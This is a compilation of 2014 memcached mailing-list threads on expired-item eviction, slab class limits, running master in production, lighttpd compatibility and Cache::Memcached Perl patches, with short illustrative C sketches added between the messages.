Hi guys, I'm running a specific case where I don't want (actually can't have) evicted items (evictions = 0 ideally)... I have created a simple algorithm that locks the cache, walks the linked list and evicts items... it causes some problems, like 10-20ms cache locks in some cases. Now I'm thinking about going through each slab's memory (slabs keep a list of allocated memory regions), looking for items; if an expired item is found, evict it. This way I can go e.g. 10k items or 1MB of memory at a time, plus pick slabs with high utilization and run this additional eviction only on them, so it'll prevent allocating memory just because unneeded data with short TTLs is occupying the HEAD of the list. With this linked-list eviction I'm able to run on 2-3GB of memory... without it, 16GB of memory is exhausted in 1-2h and then memcached starts to kill good items (leaving expired ones wasting memory)... Any comments? Thanks. You're going a bit against the base algorithm. If stuff is falling out of 16GB of memory without ever being utilized again, why is that critical? Sounds like you're optimizing the numbers instead of actually tuning anything useful. That said, you can probably just extend the slab rebalance code. There's a hook in there (which I called Angry birds mode) that drives a slab rebalance when it'd otherwise run an eviction. That code already safely walks the slab page for unlocked memory and frees it; you could edit it slightly to check for expiration and then freelist it into the slab class instead. Since it's already a background thread you could further modify it to just wake up and walk pages for stuff to evict.
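For what the suggestion above amounts to in code: the sketch below walks one contiguous page of fixed-size chunks and frees anything expired, the same shape of loop as the slab rebalance ("angry birds") page walk being referenced. The structures are deliberately simplified stand-ins, not memcached's real item or slabclass structs, and a real version would do this a page (or N items) at a time under the proper locks from a background thread.

    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>

    /* Simplified stand-ins: a slab page is a contiguous block of fixed-size
     * chunks, each holding one item header. */
    struct item {
        time_t exptime;    /* 0 = never expires */
        int    in_use;
    };

    #define CHUNK_SIZE  sizeof(struct item)
    #define PAGE_CHUNKS 8

    /* Walk one page and hand expired chunks back to the slab class.
     * Returns how many chunks were reclaimed. */
    static int crawl_page(unsigned char *page, time_t now) {
        int reclaimed = 0;
        for (int i = 0; i < PAGE_CHUNKS; i++) {
            struct item *it = (struct item *)(page + i * CHUNK_SIZE);
            if (it->in_use && it->exptime != 0 && it->exptime <= now) {
                it->in_use = 0;      /* freelist the chunk */
                reclaimed++;
            }
        }
        return reclaimed;
    }

    int main(void) {
        unsigned char *page = calloc(PAGE_CHUNKS, CHUNK_SIZE);
        time_t now = time(NULL);
        if (page == NULL) return 1;

        /* Even-numbered chunks already expired, odd ones still live. */
        for (int i = 0; i < PAGE_CHUNKS; i++) {
            struct item *it = (struct item *)(page + i * CHUNK_SIZE);
            it->in_use  = 1;
            it->exptime = (i % 2 == 0) ? now - 60 : now + 600;
        }
        printf("reclaimed %d of %d chunks\n", crawl_page(page, now), PAGE_CHUNKS);
        free(page);
        return 0;
    }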
Re: memcached master branch - production safe?
just use master. On Tue, 8 Apr 2014, Slawomir Pryczek wrote: Is it safe to use the master branch code in a production environment? When adding changes to the code, can I just fork master and use that safely, or will I need to make my modifications on the 1.4.17 code available from the website? I noticed there are some differences between the 1.4.17 version and the code available on that branch... Thanks.
Re: Setting slab class number.
It's not presently possible to do either. I would like to allow people to supply the slab classes specifically, but we haven't done it yet. 2000 slab classes have their own set of inefficiencies. You should still keep the number relatively low. On Wed, 2 Apr 2014, Slawomir Pryczek wrote: Hi guys, I noticed there's a limit on the number of slab classes. http://screencast.com/t/RqUovWXVLS Is it possible to have e.g. 2000 slab classes? Alternatively, can I just set the class sizes individually, by typing e.g. 200 tab-separated numbers? What I want to achieve is a better distribution of slab classes, optimized for storing very small values: 1. 10 bytes, 2. 11 bytes, [..] 100. 10kb, 101. 15kb, [..] 189. 100kb, 190. 150kb, etc. It seems that it isn't possible with the current formula and the -f attribute. Thanks, Slawomir.
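For context on why the -f factor can't express a 2000-class layout: the class sizes form a geometric ladder, each class being the previous chunk size times the growth factor, rounded up to an alignment, and the class count is capped fairly low. The sketch below reproduces that general idea; the base size, alignment, and cap here are illustrative, not memcached's exact values (memcached starts from its item header size plus -n and rounds differently).

    #include <stdio.h>

    #define MAX_CLASSES 64
    #define ALIGN       8

    /* Build a size ladder: start at a base chunk size and multiply by the
     * growth factor per class, rounding up to the alignment, until the max
     * chunk size or the class cap is hit. */
    static int build_classes(double factor, size_t base, size_t max, size_t *sizes) {
        int n = 0;
        double sz = (double)base;
        while (n < MAX_CLASSES && (size_t)sz < max) {
            size_t rounded = ((size_t)sz + ALIGN - 1) / ALIGN * ALIGN;
            sizes[n++] = rounded;
            sz = rounded * factor;
        }
        return n;
    }

    int main(void) {
        size_t sizes[MAX_CLASSES];
        int n = build_classes(1.25, 96, 1024 * 1024, sizes);
        printf("factor 1.25 -> %d classes; first few:", n);
        for (int i = 0; i < 6 && i < n; i++) printf(" %zu", sizes[i]);
        printf(" ...\n");
        return 0;
    }

With a cap of only a few dozen classes, even a factor very close to 1.0 cannot give the byte-granular layout asked about; that would need the explicit per-class size list mentioned as a possible future feature.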
Re: Memcached with Lighttpd
The memcached library that lighttpd uses, last I checked, was synchronous. Lighttpd is an async webserver, which means that each time it needs to fetch something from memcached it will block the entire thing while waiting for a response. It won't block for very long, mind you, but it can't process requests in parallel. Unless you aren't talking about using memcached from *within* lighttpd, in which case it probably doesn't matter. If you intend to push a ton of traffic it might bite you. If not, you'll be fine with it the way it is.

On Sat, 22 Mar 2014, jResponse IDE wrote:

Thank you, Ryan.

On Sunday, March 23, 2014 2:31:36 AM UTC+1, Ryan McElroy wrote:

Lots of people have successfully used both together, but they aren't closely related in any way that I'm aware of, so I wouldn't expect any conflicts. Is there anything in particular you're worried about? The only thing I can think of is that a library you're using to access memcached might not support lighttpd for some reason, but you can probably verify that by reading up on your library and testing it before switching over. Best of luck! ~Ryan

On Sat, Mar 22, 2014 at 1:57 PM, jResponse IDE jrespo...@gmail.com wrote:

Am I likely to run into any nasty surprises using memcached with lighttpd? I have used it often enough in a standard LAMP setup, but I now need to move to a setup with Lighttpd and MariaDB on an Ubuntu 12.04 box. I would imagine that it will work, but I thought it best to post here and verify. I'd be much obliged for any feedback.
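To make the blocking point concrete, here is a tiny hypothetical C sketch (not lighttpd or any real client library): a single-threaded loop where each handler does a synchronous cache fetch, so every other pending event waits behind that round trip:

/* Hedged illustration of a synchronous client inside a single-threaded
 * event loop. blocking_cache_get() is a stand-in that just sleeps. */
#include <stdio.h>
#include <unistd.h>

static void blocking_cache_get(void) {
    usleep(2000);   /* pretend this is a 2ms round trip to memcached */
}

int main(void) {
    /* Pretend 100 events arrived at once; each handler does one
     * synchronous cache fetch before the next event can be touched. */
    for (int ev = 0; ev < 100; ev++) {
        blocking_cache_get();          /* the whole loop stalls here */
        printf("handled event %d\n", ev);
    }
    /* ~100 * 2ms = ~200ms of serialized latency, even though an async
     * client could have overlapped those round trips. */
    return 0;
}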
Re: Cache::Memcached updates / patches
On Wed, 12 Mar 2014, Joshua Miller wrote:

On Wed, Mar 12, 2014 at 12:43 AM, dormando dorma...@rydia.net wrote:

https://github.com/unrtst/Cache-Memcached/tree/20140223-patch-cas-support This started as just wanting to get a couple of small features into Cache::Memcached, but I ended up squashing a bunch of bugs (and merging bugfixes from existing and old RT tickets), and kept adding features. The repo above includes:
* benchmarks (to make sure I didn't slow it down)
* utf8 key fixes
* utf8 value support
* compress_ratio
* compress_methods
* serialize_methods
* hash_namespace
* max_size
* digest_keys_method and digest_keys_enable
* digest_keys_threshold
* touch
* server_versions
* cas, gets, gets_multi
* cas patch for GetParserXS: https://github.com/unrtst/memcached/tree/master/trunk/api/xs/Cache-Memcached-GetParserXS
All of those are available under Cache::Memcached::Fast except for the digest_keys* items. There are some open public debates about whether using a digest as the key is a good idea, but I want to use it, and having the option is virtually free, so I included it. Cache::Memcached::Fast::Safe automatically uses a digest if the key length exceeds 200 characters, so it's not without precedent. I plan on adding ketama (aka consistent hash) support very soon. It's probably still advisable to point users to Cache::Memcached::Fast or Cache::Memcached::libmemcached, but fixing the bugs in this module and bringing it up to feature parity can't hurt. I almost wish I had given up on C:M and used one of the others instead, but this has been rewarding in its own way. It would be nice to see these make it to a CPAN release... anyone know who to reach out to for that (one of the RT tickets said to come here)? I'd also welcome any additional review of the branch. Thank you, -- Josh I.

I should probably just give the thing to you. Would you like me to review your work and cut releases, or what would be best?

If you've got a little time, an extra pair of eyeballs never hurts. Otherwise, I'd be happy to co-maintain and cut releases (user unrtst on pause/cpan). -- Josh I.

I'm not sure I do have time... I'll see about looking it over this weekend, maybe. If they look sane I'll see about co-maint. Thanks for taking the time.
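Since the digest_keys* options come up above, here is a rough, hypothetical C sketch of the general idea: hash over-long keys down to a fixed-length digest so they stay under memcached's 250-byte key limit. The 200-character threshold mirrors the Cache::Memcached::Fast::Safe behaviour mentioned above, but the FNV-1a hash and every name below are illustrative choices only, not code from those Perl modules:

/* Hedged sketch: replace keys longer than a threshold with a hex digest. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define KEY_DIGEST_THRESHOLD 200

static uint64_t fnv1a_64(const char *s) {
    uint64_t h = 1469598103934665603ULL;
    while (*s) {
        h ^= (unsigned char)*s++;
        h *= 1099511628211ULL;
    }
    return h;
}

/* Write either the original key or its hex digest into out. */
static void effective_key(const char *key, char *out, size_t outlen) {
    if (strlen(key) <= KEY_DIGEST_THRESHOLD)
        snprintf(out, outlen, "%s", key);
    else
        snprintf(out, outlen, "%016llx", (unsigned long long)fnv1a_64(key));
}

int main(void) {
    char longkey[300];
    memset(longkey, 'a', sizeof(longkey) - 1);
    longkey[sizeof(longkey) - 1] = '\0';

    char out[256];
    effective_key("user:42:profile", out, sizeof(out));
    printf("short key unchanged: %s\n", out);
    effective_key(longkey, out, sizeof(out));
    printf("long key digested:   %s\n", out);
    return 0;
}

The trade-off debated above is that the digest loses the human-readable key and introduces a (tiny) collision risk, in exchange for never hitting the key-length limit.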